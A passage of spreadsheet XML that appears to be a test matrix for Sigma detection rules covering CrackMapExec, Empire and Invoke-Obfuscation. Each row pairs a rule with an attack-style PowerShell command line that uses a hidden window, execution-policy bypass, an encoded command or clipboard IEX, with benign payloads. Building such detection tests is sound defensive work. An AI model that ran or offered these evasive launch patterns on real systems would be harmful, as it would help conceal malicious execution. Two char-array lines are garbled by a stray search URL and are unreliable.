          <t>powershell.exe -nop -"NonInteractive" -"WindowStyle" Hidden -"ExecutionPolicy" Bypass /"Command" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F319" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G319" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H319" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I319" s="43" t="n"/>
      <c r="J319" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K319" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="320" ht="15.75" customHeight="1" s="42">
      <c r="A320" s="43" t="n"/>
      <c r="B320" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C320" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D320" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E320" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" /"NonInteractive" -WINDOWsTYLE Hidden /"ExecutionPolicy" Bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F320" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G320" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H320" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I320" s="43" t="n"/>
      <c r="J320" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K320" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="321" ht="15.75" customHeight="1" s="42">
      <c r="A321" s="43" t="n"/>
      <c r="B321" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C321" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D321" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E321" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -noProFiLe -exEcUtiOnpOLicy Bypass -WInDowStyLe Hidden /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F321" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G321" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H321" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I321" s="43" t="n"/>
      <c r="J321" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K321" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="322" ht="15.75" customHeight="1" s="42">
      <c r="A322" s="43" t="n"/>
      <c r="B322" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C322" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D322" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E322" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOpRoFIle /"ExecutionPolicy" Bypass /"WindowStyle" Hidden /"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F322" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G322" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H322" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I322" s="43" t="n"/>
      <c r="J322" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K322" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="323" ht="15.75" customHeight="1" s="42">
      <c r="A323" s="43" t="n"/>
      <c r="B323" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C323" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D323" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E323" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOproFile -EXEcuTiOnpOLiCY Bypass -"WindowStyle" Hidden -EnCOdEdcomMaNd UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB...</t>
        </is>
      </c>
      <c r="F323" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G323" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H323" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I323" s="43" t="n"/>
      <c r="J323" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K323" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="324" ht="15.75" customHeight="1" s="42">
      <c r="A324" s="43" t="n"/>
      <c r="B324" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C324" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D324" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E324" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"NoProfile" -wINdoWStyLE Hidden -enCODEDCOMmaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F324" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G324" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H324" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I324" s="43" t="n"/>
      <c r="J324" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K324" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1" s="42">
      <c r="A325" s="43" t="n"/>
      <c r="B325" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C325" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D325" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E325" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass /"NoProfile" -ws Hidden -"EncodedCommand" &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F325" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G325" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H325" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I325" s="43" t="n"/>
      <c r="J325" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K325" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="326" ht="15.75" customHeight="1" s="42">
      <c r="A326" s="43" t="n"/>
      <c r="B326" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C326" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D326" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E326" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NOPROfIlE -ws Hidden -ENcodedcoMMaNd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F326" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G326" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H326" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I326" s="43" t="n"/>
      <c r="J326" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K326" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="327" ht="15.75" customHeight="1" s="42">
      <c r="A327" s="43" t="n"/>
      <c r="B327" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C327" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D327" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E327" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -WiNdoWsTYLe Hidden -EncOdedcommanD &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F327" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G327" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H327" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I327" s="43" t="n"/>
      <c r="J327" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K327" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="328" ht="15.75" customHeight="1" s="42">
      <c r="A328" s="43" t="n"/>
      <c r="B328" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C328" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D328" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E328" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTIonPOliCY Bypass -NOPrOFiLe -ws Hidden -enCOdEDcOmmaND &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F328" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G328" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H328" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I328" s="44" t="n"/>
      <c r="J328" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K328" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="329" ht="15.75" customHeight="1" s="42">
      <c r="A329" s="43" t="n"/>
      <c r="B329" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C329" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D329" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E329" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -nop -ws Hidden -enc &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F329" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G329" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H329" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I329" s="44" t="n"/>
      <c r="J329" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K329" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="330" ht="15.75" customHeight="1" s="42">
      <c r="A330" s="43" t="n"/>
      <c r="B330" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C330" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D330" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E330" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -NoProfILe -windOWstYLe Hidden -EncODEdCOMmANd &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F330" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G330" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H330" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I330" s="43" t="n"/>
      <c r="J330" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K330" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1" s="42">
      <c r="A331" s="43" t="n"/>
      <c r="B331" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C331" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D331" s="44" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E331" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exECUtIOnPOlicY Bypass -nop /"WindowStyle" Hidden -"EncodedCommand" &lt;BASE64_PAYLOAD&gt;</t>
        </is>
      </c>
      <c r="F331" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G331" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H331" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I331" s="44" t="n"/>
      <c r="J331" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K331" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="332" ht="15.75" customHeight="1" s="42">
      <c r="A332" s="43" t="n"/>
      <c r="B332" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C332" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D332" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E332" s="44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F332" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G332" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H332" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I332" s="43" t="n"/>
      <c r="J332" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K332" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1" s="42">
      <c r="A333" s="43" t="n"/>
      <c r="B333" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C333" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D333" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E333" s="44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333" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G333" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H333" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I333" s="43" t="n"/>
      <c r="J333" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K333" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1" s="42">
      <c r="A334" s="43" t="n"/>
      <c r="B334" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C334" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D334" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E334" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F334" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G334" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H334" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I334" s="43" t="n"/>
      <c r="J334" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K334" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1" s="42">
      <c r="A335" s="43" t="n"/>
      <c r="B335" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C335" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D335" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E335" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F335" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G335" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H335" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I335" s="43" t="n"/>
      <c r="J335" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K335" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1" s="42">
      <c r="A336" s="43" t="n"/>
      <c r="B336" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C336" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D336" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E336" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncOdEdcoMManD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F336" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G336" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H336" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I336" s="43" t="n"/>
      <c r="J336" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K336" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1" s="42">
      <c r="A337" s="43" t="n"/>
      <c r="B337" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C337" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D337" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E337" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncoDEDcommaND JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F337" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G337" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H337" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337" s="43" t="n"/>
      <c r="J337" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K337" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1" s="42">
      <c r="A338" s="43" t="n"/>
      <c r="B338" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C338" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D338" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E338" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F338" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G338" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H338" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I338" s="44" t="n"/>
      <c r="J338" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K338" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="339" ht="15.75" customHeight="1" s="42">
      <c r="A339" s="43" t="n"/>
      <c r="B339" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C339" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D339" s="44" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E339" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H339" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I339" s="43" t="n"/>
      <c r="J339" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K339" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="340" ht="15.75" customHeight="1" s="42">
      <c r="A340" s="43" t="n"/>
      <c r="B340" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C340" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D340" s="44" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E340" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"sta" /"NoProfile" -"NonInteractive" /"WindowStyle" Hidden -ENcoDeDCOmmANd JAB0AGUAcwB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F340" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G340" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H340" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I340" s="44" t="n"/>
      <c r="J340" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K340" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="341" ht="15.75" customHeight="1" s="42">
      <c r="A341" s="43" t="n"/>
      <c r="B341" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C341" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D341" s="44" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E341" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -sta -NOProFilE /"NonInteractive" -"WindowStyle" Hidden -"EncodedCommand" JAB0AGUAcwB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F341" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G341" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H341" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I341" s="44" t="n"/>
      <c r="J341" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K341" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="342" ht="15.75" customHeight="1" s="42">
      <c r="A342" s="43" t="n"/>
      <c r="B342" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_launch</t>
        </is>
      </c>
      <c r="C342" s="44" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell Launch Parameters</t>
        </is>
      </c>
      <c r="D342" s="44" t="inlineStr">
        <is>
          <t>79f4ede3-402e-41c8-bc3e-ebbf5f162581</t>
        </is>
      </c>
      <c r="E342" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -sTA -nop -NonInteractive -"WindowStyle" Hidden -eNCODEdCOmMAnd JAB0AGUAcwB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F342" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G342" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H342" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I342" s="43" t="n"/>
      <c r="J342" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K342" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="343" ht="15.75" customHeight="1" s="42">
      <c r="A343" s="43" t="n"/>
      <c r="B343" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C343" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D343" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E343" s="44" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F343" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G343" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H343" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I343" s="43" t="n"/>
      <c r="J343" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K343" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="344" ht="15.75" customHeight="1" s="42">
      <c r="A344" s="43" t="n"/>
      <c r="B344" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C344" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D344" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E344" s="44" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F344" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G344" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H344" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I344" s="43" t="n"/>
      <c r="J344" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K344" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="345" ht="15.75" customHeight="1" s="42">
      <c r="A345" s="43" t="n"/>
      <c r="B345" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C345" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D345" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E345" s="44" t="inlineStr">
        <is>
          <t>cmd /C "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F345" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G345" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H345" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I345" s="43" t="n"/>
      <c r="J345" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K345" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="346" ht="15.75" customHeight="1" s="42">
      <c r="A346" s="43" t="n"/>
      <c r="B346" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C346" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D346" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E346" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F346" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G346" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H346" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I346" s="43" t="n"/>
      <c r="J346" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K346" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="347" ht="15.75" customHeight="1" s="42">
      <c r="A347" s="43" t="n"/>
      <c r="B347" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C347" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D347" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E347" s="44" t="inlineStr">
        <is>
